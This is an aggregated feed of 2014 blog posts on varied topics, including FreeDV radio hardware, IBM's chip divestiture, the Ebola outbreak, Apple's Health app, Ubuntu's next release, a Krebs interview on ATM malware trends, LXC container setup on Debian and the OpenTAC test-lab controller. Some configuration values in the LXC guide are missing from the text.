Asked about the banks’ claims, Staples’s Senior Public Relations Manager Mark Cautela confirmed that Staples is in the process of investigating a “potential issue involving credit card data and has contacted law enforcement.”

“We take the protection of customer information very seriously, and are working to resolve the situation,” Cautela said. “If Staples discovers an issue, it is important to note that customers are not responsible for any fraudulent activity on their credit cards that is reported on [in] a timely basis.”  

Planet Linux AustraliaDavid Rowe: SM1000 Part 7 – Over the air in Germany

Michael Wild DL2FW in Germany recently attended a Hamfest where he demonstrated his SM1000. Michael sent me the following email (hint: I used Google translate on the web sites):

Here is the link to the review of our local hamfest.

At the bottom is a video of a short QSO on 40m using the SM-1000 over about 400km. The other station was Hermann (DF2DR). Hermann documented this QSO very well on his homepage also showing a snapshot of the waterfall during this QSO. Big selective fading as you can see, but we were doing well!

He also explains that, when switching to SSB at the same average power level, the voice was almost not understandable!

SM1000 Beta and FreeDV Update

Rick KA8BMA has been working hard on the Beta CAD work, and fighting a few Eagle DRC battles. Thanks to all his hard work we now have an up to date schematic and BOM for the Betas. He is now working on the Beta PCB layout, and we are refining the BOM with Edwin from Dragino in China. Ike, W3IKIE, has kindly been working with Rick to come up with a suitable enclosure. Thanks guys!

My current estimate is that the Beta SM1000s will be assembled in November. Once I’ve tested a few I’ll put them up on my store and start taking orders.

In the mean time I’ve thrown myself into modem simulations – playing with a 450 bit/s version of Codec 2, LPDC FEC codes, diversity schemes and coherent QPSK demodulation. I’m pushing towards a new FreeDV mode that works on fading channels at negative SNRs. More on that in later posts. The SM1000 and a new FreeDV mode are part of my goals for 2014. The SM1000 will make FreeDV easy to use, the new mode(s) will make it competitive with SSB on HF radio.

Everything is open source, both hardware and software. No vendor lock in, no software licenses and you are free to experiment and innovate.

Planet Linux AustraliaChris Samuel: IBM Pays GlobalFoundries to take Microprocessor Business

Interesting times for IBM, having already divested themselves of the x86 business by selling it on to Lenovo they’ve now announced that they’re paying GlobalFoundries $1.5bn to take pretty much that entire side of the business!

IBM (NYSE: IBM) and GLOBALFOUNDRIES today announced that they have signed a Definitive Agreement under which GLOBALFOUNDRIES plans to acquire IBM’s global commercial semiconductor technology business, including intellectual property, world-class technologists and technologies related to IBM Microelectronics, subject to completion of applicable regulatory reviews. GLOBALFOUNDRIES will also become IBM’s exclusive server processor semiconductor technology provider for 22 nanometer (nm), 14nm and 10nm semiconductors for the next 10 years.

It includes IBM’s IP and patents, though IBM will continue to do research for 5 years and GlobalFoundries will get access to that. Now what happens to those researchers (one of whom happens to be a friend of mine) after that isn’t clear.

When I heard the rumours yesterday I was wondering if IBM was aiming to do an ARM and become a fab-less CPU designer but this is much more like exiting the whole processor business altogether. The fact that they seem to be paying Global Foundries to take this off their hands also makes it sound pretty bad.

What this all means for their Power CPU is uncertain, and if I was nVidia and Mellanox in the OpenPOWER alliance I would be hoping I’d know about this before joining up!

This item originally posted here:

IBM Pays GlobalFoundries to take Microprocessor Business

TEDHow do we stop the spread of Ebola? A Q&A at TEDGlobal 2014

Chikwe Ihekweazu speaks at TEDGlobal 2014. Photo: Ryan Lash/Ryan

Chikwe Ihekweazu speaks at TEDGlobal 2014. Photo: Ryan Lash/TED

Ten years ago, epidemiologist Chikwe Ihekweazu helped fight an outbreak in South Sudan. This TED Fellow now runs the health consultancy EpiAFRIC, writes about public health issues in his native Nigeria, and is soon to start a four-week rotation on the ground fighting the Ebola epidemic. So as the outbreak continues, he sat down for a Q&A with Chris Anderson in Session 11 to give insights into what is happening and how concerned we all should be.

The first question: Can we get the scientific overview of what Ebola is and how it makes people sick?

Ihekweazu gives the disconcerting answer that, unlike some other viruses, we don’t know what the natural host is for Ebola. We do, however, know that in humans it is passed through contact with bodily fluids. We know that the disease has an incubation period of 2 to 21 days and that, unlike many other viruses, you can’t actually transmit the virus unless you are ill. “Most outbreaks are relatively small,” says Ihekweazu. In the South Sudan outbreak he helped fight a decade ago, there were less than 30 cases.

This time around, things are much worse. As of this moment, there have been close to 8,000 cases and 4,000 deaths. “This is really the worst outbreak we’ve ever dealt with — there’s really been nothing close,” says Ihekweazu. Public health advocates have one main tactic from here: to stop the chain of transmission from one sick person to another. Those most at risk for infection are family members of those already infected, health care workers and people involved in funeral rites.

The difficulty of fighting the Ebola epidemic in Africa connects to larger currents on the global stage. To illustrate this, Ihekweazu shows us two highly distorted maps of the world. The first illustrates the global deaths from infectious diseases— in this map, Africa and India are severely bloated, while the Americas appear as just a sliver. The next map shows public health spending in the world—here, the United States and Europe appear gigantic, while Africa becomes a thin line. Ihekweazu drops the shocking fact that there is one doctor to every 100,000 people in Liberia. “For Ebola to cause an outbreak, it probably picked the best two or three countries to happen in,” he says.

Ihekweazu says that he learned some important lessons in South Sudan that will be helpful this time around. For example, that the stark remoteness of isolation wards is a problem. “If you come to a place like this, it’s likely that you’re going to die there,” says Ihekweazu. “The cycle of anxiety keeps people away and keeps the outbreak spreading, because people stay home and infect their loved ones.” A big challenge now is convincing people to trust local hospitals in which they have “little confidence.”

But there is a success story: the containment of Ebola in Lagos, Nigeria. When the first case of Ebola cropped up there, it spread to 13 people quickly. But then the spread stopped. An Ebola response center was quickly spun up.

Thousand of people who’d had contact with patients were contacted and monitored carefully. It worked — there have only been 8 cases since.

Anderson’s next question for Ihekweazu: At this late stage, can the world get this under control?

“It can go either way. We could see a plateau in the next few months — which we hope for — or we could see a radical escalation,” says Ihekweazu. “It really depends on what we do in the next few weeks.”

He feels encouraged as he sees the international community rallying to support the countries most affected by Ebola. “This is a challenge for our common global community — not just a problem for Liberia and Sierra Leone,” he says. “Whether it’s influenza in Mexico, or SARS in Hong Kong, or Ebola in Liberia, the boundaries we hold so dear are not respected by infectious diseases.”

In Africa especially, governments need to step up. Ihekweazu points out that many hospitals and schools operate without running water, something he says is unacceptable. “How do we mobilize resources to deal with health, education, justice systems, to keep pace with development we’re seeing driven by the private sector across Africa?” he says. “We have a large economy, but it’s all private sector. Our public sector needs to step up.”

The final question: What can people do to help?

Ihekweazu stresses two things. First, that people support governments that are giving resources to fight this epidemic. And second, that they give money directly to Médecins Sans Frontières, or Doctors without Borders. “They know what to do — they’ve done it for years,” he says.

Racialicious#GIA14: Racial Conversation as Performance Art

Originally published at Grantmakers in the Arts

The rules of the Long Table.

The rules of the Long Table.

Can a conversation about race be a performance? What does that simple framework shift do to the conversation? The answer: everything.

The long table conversation is a fascinating thing to watch unfold. Participants come in and out as they please. There is snacking and scribbling, mostly on topic. Some people were determined watchers, setting up camp on the chairs on the far edge of the perimeter. And others eagerly queued up in the seats closest to the table, waiting for the moment they could tap someone on the shoulder, sending that performer out and putting themselves into the conversation.

The Long Table - The Beginning

The Long Table – The Beginning

The conversation starts off immediately. There aren’t really any awkward pauses. The presence of the table as a speaking space created a flow that participants respected. I wondered if an art project gave people license to break the rules and conventions of conversation. I felt inspired to draw a circle around an errant blueberry on the table. And at times, I felt the urge to run around, to lean over someone and circle their scribble, to interact out of order and out of place. After all, isn’t that art? Responding to stimuli?

But that will have to wait for another long table. People needed this space – stories flowed alongside tears and while this may have been intended as an art project the space morphed to accommodate mass catharsis.

Defining racial equity.

Defining racial equity.

Race Scrawl.

Race Scrawl.

Screen Shot 2014-10-15 at 11.01.58 AM

(TRA is an abbreviation for transracial adoptee.)

Racial Scrawl 2

Racial Scrawl 2

The session draws to a close. Many are in tears. Some feel a profound shift. Others looked at the way inequality replicated itself at the table. There is no solution. But in art, does there need to be a neat resolution?

The post #GIA14: Racial Conversation as Performance Art appeared first on Racialicious - the intersection of race and pop culture.

Geek FeminismQuick hit: Simply Secure, a new nonprofit promoting usable security, is hiring a research director and an operations manager

Simply Secure is a new non-profit that focuses on helping the open source community do a better job at security. Their focus is on adding usable security technology on top of existing, already-widely-adopted platforms and services, and their advisory board includes Wendy Seltzer, Cory Doctorow, and Angela Sasse, among others. (Full disclosure: I went to college with the executive director and founder, Sara “Scout” Sinclair Brody.)

They are hiring for two full-time positions right now: a research director/associate director with some mix of practical experience and formal education in security and UX design (sufficient experience compensates for a lesser degree of formal education), and an operations manager who will write grants and manage finances. Simply Secure strongly encourages applications from populations under-represented in the technology industry. For both positions, experience with and/or enthusiasm for open source is desirable but not required. Simply Secure is located in the US in Philadelphia and is actively recruiting candidates who work remotely.

To apply, visit their jobs page!

Sociological ImagesApple’s Health App: Where’s the Power?

In truth, I didn’t pay a tremendous amount of attention to iOS8 until a post scrolled by on my Tumblr feed, which disturbed me a good deal: The new iteration of Apple’s OS included “Health”, an app that – among many other things – contains a weight tracker and a calorie counter.

And can’t be deleted.

1 (3) - Copy

Okay, so why is this a big deal? Pretty much all “health” apps include those features. I have one (third-party). A lot of people have one. They can be very useful. Apple sticking non-removable apps into its OS is annoying, but why would it be something worth getting up in arms over? This is where it becomes a bit difficult to explain, and where you’re likely to encounter two kinds of people (somewhat oversimplified, but go with me here). One group will react with mild bafflement. The other will immediately understand what’s at stake.

The Health app is literally dangerous, specifically to people dealing with/in recovery from eating disorders and related obsessive-compulsive behaviors. Obsessive weight tracking and calorie counting are classic symptoms. These disorders literally kill people. A lot of people. Apple’s Health app is an enabler of this behavior, a temptation to fall back into self-destructive habits. The fact that it can’t be deleted makes it worse by orders of magnitude.

So why can’t people just not use it? Why not just hide it? That’s not how obsessive-compulsive behavior works. One of the nastiest things about OCD symptoms – and one of the most difficult to understand for people who haven’t experienced them – is the fact that a brain with this kind of chemical imbalance can and will make you do things you don’t want to do. That’s what “compulsive” means. Things you know you shouldn’t do, that will hurt you. When it’s at its worst it’s almost impossible to fight, and it’s painful and frightening. I don’t deal with disordered eating, but my messed-up neurochemistry has forced me to do things I desperately didn’t want to do, things that damaged me. The very presence of this app on a device is a very real threat (from post linked above):

Whilst of course the app cannot force you to use it, it cannot be deleted, so will be present within your apps and can be a source of feelings of temptation to record numbers and of guilt and judgement for not using the app.

Apple doesn’t hate people with eating disorders. They probably weren’t thinking about people with eating disorders at all. That’s the problem.

Then this weekend another post caught my attention: The Health app doesn’t include the ability to track menstrual cycles, something that’s actually kind of important for the health of people who menstruate. Again: so? Apple thinks a number of other forms of incredibly specific tracking were important enough to include:

In case you’re wondering whether Health is only concerned with a few basics: Apple has predicted the need to input data about blood oxygen saturation, your daily molybdenum or pathogenic acid intake, cycling distance, number of times fallen and your electrodermal activity, but nothing to do with recording information about your menstrual cycle.

Again: Apple almost certainly doesn’t actively hate cisgender women, or anyone else who menstruates. They didn’t consider including a cycle tracker and then went “PFFT SCREW WOMEN.” They probably weren’t thinking about women at all.

During the design phase of this OS, half the world’s population was probably invisible. The specific needs of this half of the population were folded into an unspecified default. Which doesn’t – generally – menstruate.

I should note that – of course – third-party menstrual cycle tracking apps exist. But people have problems with these (problems I share), and it would have been nice if Apple had provided an escape from them:

There are already many apps designed for tracking periods, although many of my survey respondents mentioned that they’re too gendered (there were many complaints about colour schemes, needless ornamentation and twee language), difficult to use, too focused on conceiving, or not taking into account things that the respondents wanted to track.

Both of these problems are part of a larger design issue, and it’s one we’ve talked about before, more than once. The design of things – pretty much all things – reflects assumptions about what kind of people are going to be using the things, and how those people are going to use them. That means that design isn’t neutral. Design is a picture of inequality, of systems of power and domination both subtle and not. Apple didn’t consider what people with eating disorders might be dealing with; that’s ableism. Apple didn’t consider what menstruating women might need to do with a health app; that’s sexism.

The fact that the app cannot be removed is a further problem. For all intents and purposes, updating to a new OS is almost mandatory for users of Apple devices, at least eventually. Apple already has a kind of control over a device that’s a bit worrying, blurring the line between owner and user and threatening to replace one with the other. The Health app is a glimpse of a kind of well-meaning but ultimately harmful paternalist approach to design: We know what you need, what you want; we know what’s best. We don’t need to give you control over this. We know what we’re doing.

This isn’t just about failure of the imagination. This is about social power. And it’s troubling.

Sarah Wanenchak is a PhD student at the University of Maryland, College Park. Her current research focuses on contentious politics and communications technology in a global context, particularly the role of emotion mediated by technology as a mobilizing force. She blogs at Cyborgology, where this post originally appearedand you can follow her at @dynamicsymmetry.

(View original at

Mark ShuttleworthV is for Vivid

Release week! Already! I wouldn’t call Trusty ‘vintage’ just yet, but Utopic is poised to leap into the torrent stream. We’ve all managed to land our final touches to *buntu and are excited to bring the next wave of newness to users around the world. Glad to see the unicorn theme went down well, judging from the various desktops I see on G+.

And so it’s time to open the vatic floodgates and invite your thoughts and contributions to our soon-to-be-opened iteration next. Our ventrous quest to put GNU as you love it on phones is bearing fruit, with final touches to the first image in a new era of convergence in computing. From tiny devices to personal computers of all shapes and sizes to the ventose vistas of cloud computing, our goal is to make a platform that is useful, versal and widely used.

Who would have thought – a phone! Each year in Ubuntu brings something new. It is a privilege to celebrate our tenth anniversary milestone with such vernal efforts. New ecosystems are born all the time, and it’s vital that we refresh and renew our thinking and our product in vibrant ways. That we have the chance to do so is testament to the role Linux at large is playing in modern computing, and the breadth of vision in our virtual team.

To our fledgling phone developer community, for all your votive contributions and vocal participation, thank you! Let’s not be vaunty: we have a lot to do yet, but my oh my what we’ve made together feels fantastic. You are the vigorous vanguard, the verecund visionaries and our venerable mates in this adventure. Thank you again.

This verbose tract is a venial vanity, a chance to vector verbal vibes, a map of verdant hills to be climbed in months ahead. Amongst those peaks I expect we’ll find new ways to bring secure, free and fabulous opportunities for both developers and users. This is a time when every electronic thing can be an Internet thing, and that’s a chance for us to bring our platform, with its security and its long term support, to a vast and important field. In a world where almost any device can be smart, and also subverted, our shared efforts to make trusted and trustworthy systems might find fertile ground. So our goal this next cycle is to show the way past a simple Internet of things, to a world of Internet things-you-can-trust.

In my favourite places, the smartest thing around is a particular kind of monkey. Vexatious at times, volant and vogie at others, a vervet gets in anywhere and delights in teasing cats and dogs alike. As the upstart monkey in this business I can think of no better mascot. And so let’s launch our vicenary cycle, our verist varlet, the Vivid Vervet!

RacialiciousLive From San Diego Comic Fest: The Afrofuturism Panel

By Arturo R. García

The final day of the Comic Fest opened with one of the most far-ranging topics in speculative fiction in Afrofuturism. And true to form, the speakers reached into the past and toward the future in discussing not only their interpretation of the concept, but how it has influenced their fandom and their work.

<iframe allowtransparency="true" frameborder="no" height="750" src="" width="100%"></iframe><script src=""></script>
<noscript>[View the story "San Diego Comic Fest: Afrofuturism" on Storify]</noscript>

Top image: A still from the trailer for “The Crypto-Historians,” which can be seen below.

<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="" width="560"></iframe>

The post Live From San Diego Comic Fest: The Afrofuturism Panel appeared first on Racialicious - the intersection of race and pop culture.

Planet DebianMichal Čihař: Hosted Weblate has new UI

The biggest part of this HackWeek will be spent on Weblate. The major task is to complete new UI for it. There have been already some blog posts about that here, so regular readers of my blog already know it is using Twitter Bootstrap.

Today it has reached point where I think it's good enough for wider testing and I've deployed it at Hosted Weblate (see Weblate website for conditions for getting hosting there).

I expect there will be some rough edges, so don't hesitate to report any issues, so that I can quickly fix them.

Filed under: English phpMyAdmin SUSE Weblate | 0 comments | Flattr this!

RacialiciousLive From San Diego Comic Fest: Latino Comics

By Arturo R. García

Over the weekend I went to the third annual San Diego Comic Fest, which has pointedly positioned itself as the anti-Comic Con.

Specifically, the size of the event is kept manageable for vendors, presenters and attendees alike; no conference room holds more than 40 or 50 people at one time, allowing for a more relaxed atmosphere and easier conversations between panelists and their audiences.

One end result is, panels focusing on diversity don’t feel as lost in the shuffle. And the Latino Comics panel covered not only industry trends within Latin America, but the rapidly-evolving effects of Latinidad on the U.S.’ identity.

<iframe allowtransparency="true" frameborder="no" height="750" src="" width="100%"></iframe><script src=""></script>
<noscript>[View the story "San Diego Comic Fest: Latino Comics" on Storify]</noscript>

[Top image via "The Condor and The Eagle: A Pilgrimage to Machu Picchu" official Facebook page]

The post Live From San Diego Comic Fest: Latino Comics appeared first on Racialicious - the intersection of race and pop culture.

Planet Linux AustraliaAndrew Pollock: [life] Day 264: Pupil Free Day means lots of park play

Today was a Kindergarten (and it seemed most of the schools in Brisbane) Pupil Free Day.

Grace, the head honcho of Thermomix in Australia, was supposed to be in town for a meet and greet, and a picnic in New Farm Park had been organised, but at the last minute she wasn't able to make it due to needing to be in Perth for a meeting. The plan changed and we had a Branch-level picnic meeting at the Colmslie Beach Reserve.

So after Sarah dropped Zoe off, I whipped up some red velvet cheesecake brownie, which seems to be my go to baked good when required to bring a plate (it's certainly popular) and I had some leftover sundried tomatoes, so I whipped up some sundried tomato dip as well.

The meet up in the park was great. My group leader's daughters were there, as were plenty of other consultant's kids due to the Pupile Free Day, and Zoe was happy to hang out and have a play. There was lots of yummy food, and we were able to graze and socialise a bit. We called it lunch.

After we got home, we had a bit of a clean up of the balcony, which had quite a lot of detritus from various play dates and craft activities. Once that was done, we had some nice down time in the hammock.

We then biked over to a park to catch up with Zoe's friend Mackensie for a play date. The girls had a really nice time, and I discovered that the missing link in the riverside bike path has been completed, which is rather nice for both cycling and running. (It goes to show how long it's been since I've gone for a run, I really need to fix that).

After that, we biked home, and I made dinner. We got through dinner pretty quickly, and so Zoe and I made a batch of ginger beer after dinner, since there was a Thermomix recipe for it. It was cloudy though, and Zoe was more used to the Bunderberg ginger beer, which is probably a bit better filtered, so she wasn't so keen on it.

All in all, it was a really lovely way to spend a Pupil Free Day.

Worse Than FailureCodeSOD: Parallel SQL Queries

Daniele worked at a pharmaceutical firm that had an old web application that allowed commercial customers to look up information. Since the data was quite complicated, there were numerous fields that needed to be queried in order to populate the form.

Unfortunately, as the amount of data in the system grew, the time to load the form grew as well. And grew. And grew.

Fortunately, the DBA in charge of setting up the underlying tables was actually quite capable at setting up tables with the proper relationships. For example, an address consists of street, city, zip, province and country. A country can contain multiple provinces which can contain multiple cities which can contain multiple zip codes, and so forth. As it was well organized, the database was not the problem; the source of the slowness was likely in the code.

And what code it was. The programmer that engineered this had to have revered this piece of brillance as well. They decided that they would support substantial data growth by querying the data in parallel. Yes, there would be a separate query for each field - run in a separate thread - in parallel. In other words, all of the queries had essentially the same where-clause (except for the joins); only the fields that were selected were different. For cases where one field depended upon another, the dependency was handled like this in the corresponding query classes, which all followed the same pattern:

   class StreetQuery implements Thread {
      // Street names can be duplicated. We need to know in which 
      // city this street resides in order to query for it.
      private CityQuery city;
      private boolean finished = false;
      public StreetQuery(CityQuery city) { = city;
      public boolean isRunning() {
        return !finished;
      public void run() {
        // Wait until query on which we depend finishes
        while (city.isRunning());
        // do query here, using any results from dependent queries as needed
        finished = true;

Daniele replaced all of that with a single stored procedure and the delays were gone.

One can't help but wonder if the author of the original code might have been helping themselves to a few too many sample products...

Planet DebianMichal Čihař: Enca 1.16

As a first tiny project in this HackWeek, Enca 1.16 has been just released. It mostly brings small code cleanups and missing aliases for languages, but fixes also some minor bugs found by Coverity Scan.

If you don't know Enca, it is an Extremely Naive Charset Analyser. It detects character set and encoding of text files and can also convert them to other encodings using either a built-in converter or external libraries and tools like libiconv, librecode, or cstocs.

Full list of changes for 1.16 release:

  • Fixed typo in Belarusian language name
  • Added aliases for Chinese and Yugoslavian languages

Still enca is in maintenance mode only and I have no intentions to write new features. However there is no limitation to other contributors :-).

You can download from

Filed under: Enca English SUSE | 0 comments | Flattr this!

Krebs on SecuritySpike in Malware Attacks on Aging ATMs

This author has long been fascinated with ATM skimmers, custom-made fraud devices designed to steal card data and PINs from unsuspecting users of compromised cash machines. But a recent spike in malicious software capable of infecting and jackpotting ATMs is shifting the focus away from innovative, high-tech skimming devices toward the rapidly aging ATM infrastructure in the United States and abroad.

Last month, media outlets in Malaysia reported that organized crime gangs had stolen the equivalent of about USD $1 million with the help of malware they’d installed on at least 18 ATMs across the country. Several stories about the Malaysian attack mention that the ATMs involved were all made by ATM giant NCR. To learn more about how these attacks are impacting banks and the ATM makers, I reached out to Owen Wild, NCR’s global marketing director, security compliance solutions.

Wild said ATM malware is here to stay and is on the rise.


BK: I have to say that if I’m a thief, injecting malware to jackpot an ATM is pretty money. What do you make of reports that these ATM malware thieves in Malaysia were all knocking over NCR machines?

OW: The trend toward these new forms of software-based attacks is occurring industry-wide. It’s occurring on ATMs from every manufacturer, multiple model lines, and is not something that is endemic to NCR systems. In this particular situation for the [Malaysian] customer that was impacted, it happened to be an attack on a Persona series of NCR ATMs. These are older models. We introduced a new product line for new orders seven years ago, so the newest Persona is seven years old.

BK: How many of your customers are still using this older model?

OW: Probably about half the install base is still on Personas.

BK: Wow. So, what are some of the common trends or weaknesses that fraudsters are exploiting that let them plant malware on these machines? I read somewhere that the crooks were able to insert CDs and USB sticks in the ATMs to upload the malware, and they were able to do this by peeling off the top of the ATMs or by drilling into the facade in front of the ATM. CD-ROM and USB drive bays seem like extraordinarily insecure features to have available on any customer-accessible portions of an ATM.

OW: What we’re finding is these types of attacks are occurring on standalone, unattended types of units where there is much easier access to the top of the box than you would normally find in the wall-mounted or attended models.

BK: Unattended….meaning they’re not inside of a bank or part of a structure, but stand-alone systems off by themselves.

OW: Correct.

BK: It seems like the other big factor with ATM-based malware is that so many of these cash machines are still running Windows XP, no?

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.

This new malware, detected by Kaspersky Lab as Backdoor.MSIL.Tyupkin, affects ATMs from a major ATM manufacturer running Microsoft Windows 32-bit.

OW: Right now, that’s not a major factor. It is certainly something that has to be considered by ATM operators in making their migration move to newer systems. Microsoft discontinued updates and security patching on Windows XP, with very expensive exceptions. Where it becomes an issue for ATM operators is that maintaining Payment Card Industry (credit and debit card security standards) compliance requires that the ATM operator be running an operating system that receives ongoing security updates. So, while many ATM operators certainly have compliance issues, to this point we have not seen the operating system come into play.

BK: Really?

OW: Yes. If anything, the operating systems are being bypassed or manipulated with the software as a result of that.

BK: Wait a second. The media reports to date have observed that most of these ATM malware attacks were going after weaknesses in Windows XP?

OW: It goes deeper than that. Most of these attacks come down to two different ways of jackpotting the ATM. The first is what we call “black box” attacks, where some form of electronic device is hooked up to the ATM — basically bypassing the infrastructure in the processing of the ATM and sending an unauthorized cash dispense code to the ATM. That was the first wave of attacks we saw that started very slowly in 2012, went quiet for a while and then became active again in 2013.

The second type that we’re now seeing more of is attacks that start with the introduction of malware into the machine, and that kind of attack is a little less technical to get on the older machines if protective mechanisms aren’t in place.

BK: What sort of protective mechanisms, aside from physically securing the ATM?

OW: If you work on the configuration setting…for instance, if you lock down the BIOS of the ATM to eliminate its capability to boot from USB or CD drive, that gets you about as far as you can go. In high risk areas, these are the sorts of steps that can be taken to reduce risks.

BK: Seems like a challenge communicating this to your customers who aren’t anxious to spend a lot of money upgrading their ATM infrastructure.

OW: Most of these recommendations and requirements have to be considerate of the customer environment. We make sure we’ve given them the best guidance we can, but at end of the day our customers are going to decide how to approach this.

BK: You mentioned black-box attacks earlier. Is there one particular threat or weakness that makes this type of attack possible? One recent story on ATM malware suggested that the attackers may have been aided by the availability of ATM manuals online for certain older models.

OW: The ATM technology infrastructure is all designed on multivendor capability. You don’t have to be an ATM expert or have inside knowledge to generate or code malware for ATMs. Which is what makes the deployment of preventative measures so important. What we’re faced with as an industry is a combination of vulnerability on aging ATMs that were built and designed at a point where the threats and risk were not as great.

According to security firm F-Secure, the malware used in the Malaysian attacks was “PadPin,” a family of malicious software first identified by Symantec. Also, Russian antivirus firm Kaspersky has done some smashing research on a prevalent strain of ATM malware that it calls “Tyupkin.” Their write-up on it is here, and the video below shows the malware in action on a test ATM.

In a report published this month, the European ATM Security Team (EAST) said it tracked at least 20 incidents involving ATM jackpotting with malware in the first half of this year. “These were ‘cash out’ or ‘jackpotting’ attacks and all occurred on the same ATM type from a single ATM deployer in one country,” EAST Director Lachlan Gunn wrote. “While many ATM Malware attacks have been seen over the past few years in Russia, Ukraine and parts of Latin America, this is the first time that such attacks have been reported in Western Europe. This is a worrying new development for the industry in Europe”

Card skimming incidents fell by 21% compared to the same period in 2013, while overall ATM related fraud losses of €132 million (~USD $158 million) were reported, up 7 percent from the same time last year.

<iframe allowfullscreen="allowfullscreen" frameborder="0" height="415" src="" width="580"></iframe>

Planet DebianFrancois Marier: LXC setup on Debian jessie

Here's how to setup LXC-based "chroots" on Debian jessie. While this is documented on the Debian wiki, I had to tweak a few things to get the networking to work on my machine.

Start by installing (as root) the necessary packages:

apt-get install lxc libvirt-bin debootstrap

Network setup

I decided to use the default /etc/lxc/default.conf configuration (no change needed here): = veth = up = virbr0 = 00:FF:AA:xx:xx:xx =

but I had to make sure that the "guests" could connect to the outside world through the "host":

  1. Enable IPv4 forwarding by putting this in /etc/sysctl.conf:

  2. and then applying it using:

    sysctl -p
  3. Ensure that the network bridge is automatically started on boot:

    virsh -c lxc:/// net-start default
    virsh -c lxc:/// net-autostart default
  4. and that it's not blocked by the host firewall, by putting this in /etc/network/iptables.up.rules:

    -A INPUT -d -s -j ACCEPT
    -A INPUT -d -s -j ACCEPT
    -A INPUT -d -s -j ACCEPT
  5. and applying the rules using:


Creating a container

Creating a new container (in /var/lib/lxc/) is simple:

sudo MIRROR= lxc-create -n sid64 -t debian -- -r sid -a amd64

You can start or stop it like this:

sudo lxc-start -n sid64 -d
sudo lxc-stop -n sid64

Connecting to a guest using ssh

The ssh server is configured to require pubkey-based authentication for root logins, so you'll need to log into the console:

sudo lxc-stop -n sid64
sudo lxc-start -n sid64

then install a text editor inside the container because the root image doesn't have one by default:

apt-get install vim

then paste your public key in /root/.ssh/authorized_keys.

Then you can exit the console (using Ctrl+a q) and ssh into the container. You can find out what IP address the container received from DHCP by typing this command:

sudo lxc-ls --fancy

Fixing Perl locale errors

If you see a bunch of errors like these when you start your container:

perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "fr_CA.utf8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").

then log into the container as root and use:

dpkg-reconfigure locales

to enable the same locales as the ones you have configured in the host.


Planet DebianNeil Williams: OpenTAC – an automation lab in a box

I’ve previously covered running LAVA on ARM devices, now that the packages are in Debian. I’ve also covered setting up the home lab, including the difficulty in obtaining the PDU and relying on another machine to provide USB serial converters with inherent problems of needing power to keep the same devices assigned to the same ser2net ports.

There have been ideas about how to improve the situation. Conferences are a prime example – setting up a demo involving LAVA means bringing a range of equipment, separate power bricks, separate network switches (with power bricks), a device of some kind to connect up the USB serial converters (and power brick) and then the LAVA server (with SATA drive and power brick) – that is without the actual devices and their cables and power. Each of those power cables tend to be a metre long, with networking and serial, it quickly becomes a cable spaghetti.

Ideas around this also have application inside larger deployments, so the hardware would need to daisy-chain to provide services to a rack full of test devices.

The objective is a single case providing network, power and serial connectivity to a number of test devices over a single power input and network uplink. Naturally, with a strong free software and open development bias, the unit will be Open Hardware running Debian, albeit with a custom Beaglebone Linux kernel. It’s a Test Automation Controller, so we’re using the name OpenTAC.


Open hardware ARM device running Debian to automate tests on 4 to 8 devices, initially aimed at LAVA support for Linaro engineers. Power distribution, serial console, network and optional GPIO extensions.

The design involves:

  • A Beaglebone Black (revC)
    • USB hotplug support required, certainly during development.
  • Custom PCB connected as a Beaglebone Cape, designed by Andy Simpkins.
  • Base board provides 4 channels:
    • 5V Power – delivered over USB
    • Ethernet – standard Cat5, no LEDs
    • Serial connectivity
      • RS232
      • UART
    • GPIO
  • Internal gigabit network switch
  • Space for a board like a CubieTruck (with SATA drive) to act as LAVA server
  • Daughter board:
    • Same basic design as the base board, providing another 4 channels, equivalent to the base channels. When the daughter board is fitted, a second network switch would be added instead of the CubieTruck.
  • Power consumption measurement per channel
    • queries made via the Beaglebone Black over arbitrary time periods, including during the test itself.
  • The GPIO lines can be used to work around issues with development boards under test, including closing connections which may be required to get a device to reboot automatically, without manual intervention.
  • Serial connections to test devices can be isolated during device power-cycles – this allows for devices which pull power over the serial connection. (These are typically hardware design issues but the devices still need to be tested until the boards can be modified or replaced.)
  • Thermal control, individual fan control via the Beaglebone Black.
  • 1U case – rackable or used alone on the desk of developers.
  • Software design:
    • lavapdu backend module for PDU control ( & opentac daemon on the BBB
      • telnet opentac-01 3225
    • ser2net for serial console control
      • telnet opentac-01 4000

The initial schematics are now complete and undergoing design review. A lot of work remains …

Chaotic IdealismThis Cool Thing My Cat Did

So today I'm walking down a hallway, shoes on and intent to getting to the door because, darn it, if I don't go shopping today I'll have to go a sixth day without a shower curtain. And Tiny, all twelve pounds of inquisitive nannyish boy-cat, comes down the hallway the other way. It's a narrow hallway because the apartment's small and there's a vacuum cleaner on one side of it, so we can't pass by each other comfortably.

Tiny looks at me, looks at my big clunky shoes (which he hates me wearing, since they make me clumsy and noisy), and stops right where he is. He's saying, "Uhh... you first," and thinking "Bzzzzt! Clumsy human sighted! Collision avoidance system activated!"

I look at Tiny and I automatically move to the side of the hallway, pressing myself against the wall. Tiny sees this, his tail goes up, and he marches through the provided gap. He's acknowledging that I've given him the right of way, and he's saying, "Thanks, have a good day!"

I've seen this happen so many times with humans in narrow spaces, but I didn't realize cats did it, too. It shouldn't surprise me that Tiny gets the idea of sharing a narrow hallway, since he's so good at figuring out everything else I do. In fact, I'm pretty sure he gets it better than me--there have been many times when I've run into things, tangled up foot traffic, and generally caused confusion because I couldn't insert myself properly into the rhythm of people walking and sharing a sidewalk. But Tiny gets it.

My cat is awesome.

Planet DebianDirk Eddelbuettel: littler 0.2.1

max-heap image

A new maintenance release of littler is available now.

The main change are a few updates and extensions to the examples provided along with littler. Several of those continue to make use of the wonderful docopt package by Edwin de Jonge. Carl Boettiger and I are making good use of these littler examples, particularly to install directly from CRAN or GitHub, in our Rocker builds of R for Docker (about which we should have a bit more to blog soon too).

Full details for the littler release are provided as usual at the ChangeLog page.

The code is available via the GitHub repo, from tarballs off my littler page and the local directory here. A fresh package has gone to the incoming queue at Debian; Michael Rutter will probably have new Ubuntu binaries at CRAN in a few days too.

Comments and suggestions are welcome via the mailing list or issue tracker at the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

